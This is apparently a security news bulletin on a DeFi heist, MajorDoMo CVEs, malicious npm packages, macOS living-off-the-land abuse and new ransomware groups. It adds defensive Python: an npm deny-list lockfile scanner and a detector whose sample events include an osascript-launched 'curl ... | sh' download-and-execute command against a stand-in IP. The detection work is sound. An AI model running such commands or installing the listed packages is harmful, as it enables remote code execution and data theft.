Cybersecurity Alert: $290M DeFi Heist, macOS Exploits, and Emerging Threats
In the ever-evolving landscape of cybersecurity, recent incidents underscore the persistent vulnerabilities and sophisticated tactics employed by malicious actors. This week’s ThreatsDay Bulletin highlights several critical developments that demand immediate attention and proactive measures.
State-Sponsored DeFi Breach
The decentralized finance (DeFi) sector has once again been targeted, with KelpDAO suffering a significant breach resulting in the loss of $290 million. Investigations suggest that the North Korean-affiliated group, TraderTraitor, orchestrated this attack. The perpetrators exploited vulnerabilities within LayerZero’s infrastructure, specifically compromising two Remote Procedure Call (RPC) nodes and launching a Distributed Denial-of-Service (DDoS) attack on a third. This multi-faceted assault allowed them to manipulate downstream RPC infrastructure, leading to unauthorized fund transfers. In response, the Arbitrum Security Council has frozen approximately 30,766 ETH linked to the exploit. This incident echoes previous attacks attributed to TraderTraitor, including the $1.5 billion Bybit hack in early 2025 and the $285 million theft from the Drift Protocol.
Active Exploitation of MajorDoMo Vulnerabilities
VulnCheck has identified active exploitation attempts targeting two critical vulnerabilities in MajorDoMo, a widely used smart home automation platform. The first, CVE-2026-27175, is a command injection flaw that attackers have been exploiting since April 13 to deploy persistent PHP webshells, granting them continuous backdoor access. The second, CVE-2026-27174, allows unauthenticated remote code execution via the PHP console in the admin panel, with exploitation attempts detected from April 18. These vulnerabilities highlight the pressing need for users to apply patches promptly and monitor their systems for signs of compromise.
Surge in Malicious npm Packages
The npm registry has recently been infiltrated by several malicious packages designed to steal sensitive data, conduct system reconnaissance, and implant SSH backdoors. Notable among these are:
– `ixpresso-core`
– `forge-jsx`
– `@genoma-ui/components`, `@needl-ai/common`, `rrweb-v1`
– `cjs-biginteger`, `sjs-biginteger`, `bjs-biginteger`
– `@fairwords/websocket`, `@fairwords/loopback-connector-es`, `@fairwords/encryption`
– `js-logger-pack`
– `@kindo/selfbot`
Developers are urged to scrutinize dependencies, verify the integrity of packages before integration, and stay vigilant against supply chain attacks that can compromise entire ecosystems.
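As an added example (not code from the bulletin or any named project), the check below scans a project's `package-lock.json` for the packages named above, including ones pulled in transitively, and also flags lockfile entries that carry no `integrity` hash, since npm cannot verify such a tarball against what was reviewed. The lockfile content is constructed for illustration.

```python
import json

# Package names called out in the bulletin above, used here as a deny-list.
FLAGGED_PACKAGES = {
    "ixpresso-core", "forge-jsx", "@genoma-ui/components", "@needl-ai/common",
    "rrweb-v1", "cjs-biginteger", "sjs-biginteger", "bjs-biginteger",
    "@fairwords/websocket", "@fairwords/loopback-connector-es",
    "@fairwords/encryption", "js-logger-pack", "@kindo/selfbot",
}

# Constructed sample package-lock.json (lockfileVersion 3 layout); not a real project.
SAMPLE_LOCKFILE = json.dumps({
    "name": "demo-app", "lockfileVersion": 3,
    "packages": {
        "": {"dependencies": {"express": "^4.19.0", "forge-jsx": "^1.0.2"}},
        "node_modules/express": {"version": "4.19.2",
            "resolved": "https://registry.npmjs.org/express/-/express-4.19.2.tgz",
            "integrity": "sha512-CONSTRUCTED-PLACEHOLDER"},
        "node_modules/forge-jsx": {"version": "1.0.2",
            "resolved": "https://registry.npmjs.org/forge-jsx/-/forge-jsx-1.0.2.tgz",
            "integrity": "sha512-CONSTRUCTED-PLACEHOLDER"},
        # Transitive dependency nested under express, with no integrity field at all.
        "node_modules/express/node_modules/@fairwords/encryption": {"version": "0.3.1",
            "resolved": "https://registry.npmjs.org/@fairwords/encryption/-/encryption-0.3.1.tgz"},
    },
})

def package_name(lock_path: str) -> str:
    """Turn a lockfile path like 'node_modules/a/node_modules/@s/b' into '@s/b'."""
    return lock_path.split("node_modules/")[-1]

def audit_lockfile(lockfile_text: str):
    """Return (flagged, missing_integrity): lockfile paths matching the deny-list,
    and lockfile paths with no integrity hash for npm to verify the tarball against."""
    lock = json.loads(lockfile_text)
    flagged, missing_integrity = [], []
    for path, meta in lock.get("packages", {}).items():
        if path == "":          # the root project entry, not a dependency
            continue
        if package_name(path) in FLAGGED_PACKAGES:
            flagged.append(path)
        if "integrity" not in meta:
            missing_integrity.append(path)
    return flagged, missing_integrity

if __name__ == "__main__":
    hits, unverified = audit_lockfile(SAMPLE_LOCKFILE)
    for p in hits:
        print(f"DENY-LISTED: {p}")
    for p in unverified:
        print(f"NO INTEGRITY HASH: {p}")
```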
macOS Living-off-the-Land (LotL) Abuse
Security researchers have uncovered instances where attackers are leveraging native macOS utilities to execute malicious activities, a technique known as Living-off-the-Land (LotL). By abusing legitimate tools, such as `osascript` and `curl`, adversaries can evade detection, maintain persistence, and execute arbitrary commands without triggering traditional security alerts. This method underscores the importance of monitoring legitimate tool usage for anomalous behavior and implementing behavioral analytics to detect such stealthy attacks.
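The behavioural monitoring the paragraph calls for can be prototyped as a few rules over process-execution telemetry. The example below is added here and is not from the original bulletin; it runs three heuristics (an `osascript -e` script that invokes `do shell script`, a shell that pipes `curl` output into an interpreter, and `curl` spawned by a parent such as `osascript` or a mail client) over constructed JSON-lines events. The event format and the parent-process list are assumptions to be tuned against a fleet's own baseline.

```python
import json
import shlex

# Constructed sample process-execution events (JSON lines), loosely modelled on what
# an EDR or Endpoint Security export might contain; not real telemetry.
SAMPLE_EVENTS = r"""
{"ts":"2026-04-20T10:01:02Z","parent":"Terminal","proc":"curl","cmd":"curl -s https://example.com/api/status"}
{"ts":"2026-04-20T10:05:44Z","parent":"Mail","proc":"osascript","cmd":"osascript -e 'do shell script \"curl -fsSL http://203.0.113.5/x.sh | sh\"'"}
{"ts":"2026-04-20T10:05:45Z","parent":"osascript","proc":"sh","cmd":"sh -c \"curl -fsSL http://203.0.113.5/x.sh | sh\""}
{"ts":"2026-04-20T10:05:45Z","parent":"osascript","proc":"curl","cmd":"curl -fsSL http://203.0.113.5/x.sh"}
{"ts":"2026-04-20T10:07:10Z","parent":"Finder","proc":"osascript","cmd":"osascript /Users/alice/Scripts/resize.scpt"}
""".strip()

SHELLS = {"sh", "bash", "zsh"}
# Parents that should rarely spawn a downloader directly (assumed list; tune to your baseline).
SCRIPT_HOSTS = {"osascript", "Mail", "Safari", "Preview"}

def argv_of(cmd: str) -> list:
    """Tokenise a command line; fall back to whitespace split on unbalanced quotes."""
    try:
        return shlex.split(cmd)
    except ValueError:
        return cmd.split()

def detect(event: dict) -> list:
    """Return the names of the LotL heuristics this single event trips (empty if none)."""
    hits = []
    proc, cmd, parent = event["proc"], event["cmd"], event["parent"]
    if proc == "osascript" and "-e" in argv_of(cmd) and "do shell script" in cmd:
        hits.append("osascript-inline-shell")     # AppleScript used as a shell launcher
    if proc in SHELLS and "curl" in cmd and "|" in cmd:
        hits.append("curl-piped-to-shell")        # download-and-execute in one command
    if proc == "curl" and parent in SCRIPT_HOSTS:
        hits.append("curl-from-scripting-parent") # downloader spawned by osascript/mail client
    return hits

def scan(jsonl: str) -> list:
    """Run detect() over every event line; return (ts, hits) for events with any hit."""
    findings = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        hits = detect(event)
        if hits:
            findings.append((event["ts"], hits))
    return findings

if __name__ == "__main__":
    for ts, hits in scan(SAMPLE_EVENTS):
        print(ts, ", ".join(hits))
```

The plain `curl` from Terminal and the `osascript` run of a local `.scpt` file produce no findings, which is the point: the rules key on the combination of tool, parent and arguments rather than on the tool name alone.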
ProxySmart SIM Farms and SMS Fraud
A recent investigation has exposed the operation of ProxySmart SIM farms, which are being exploited to facilitate large-scale SMS fraud. These farms consist of numerous SIM cards managed remotely to send bulk messages, often used in phishing campaigns, spam distribution, and bypassing SMS-based authentication mechanisms. The existence of such operations highlights the need for enhanced monitoring of SMS traffic, the adoption of multi-factor authentication methods beyond SMS, and the implementation of robust anti-fraud measures by telecom providers.
Emergence of New Threat Actors
The cybersecurity community has identified several new hacktivist, data extortion, and ransomware groups, including:
– Harakat Ashab al-Yamin al-Islamia
– World Leaks
– Lamashtu
– Payouts King
– BravoX
– Black Shrantac
– NBLOCK
– Ndm448
– Chip
– Ransoomed
– Zollo
The proliferation of these groups indicates a growing trend of cybercriminals forming specialized factions to target specific industries and regions. Organizations must stay informed about emerging threats, share intelligence with peers, and adopt a proactive stance in threat detection and response.
Persistent Exploitation of Known Vulnerabilities
Despite the availability of patches and mitigations, attackers continue to exploit longstanding vulnerabilities. This persistence suggests that many organizations are neglecting basic security hygiene practices, such as timely patching, thorough vetting of third-party components, and limiting trust in external inputs. The cybersecurity community emphasizes the importance of adhering to fundamental security measures to prevent avoidable breaches and minimize the attack surface.
Conclusion
The recent spate of cyber incidents serves as a stark reminder of the dynamic and persistent nature of cyber threats. Organizations and individuals alike must prioritize cybersecurity by implementing robust defenses, staying informed about emerging threats, and fostering a culture of vigilance. By addressing known vulnerabilities, scrutinizing supply chain components, and monitoring for anomalous activities, the risk of compromise can be significantly reduced.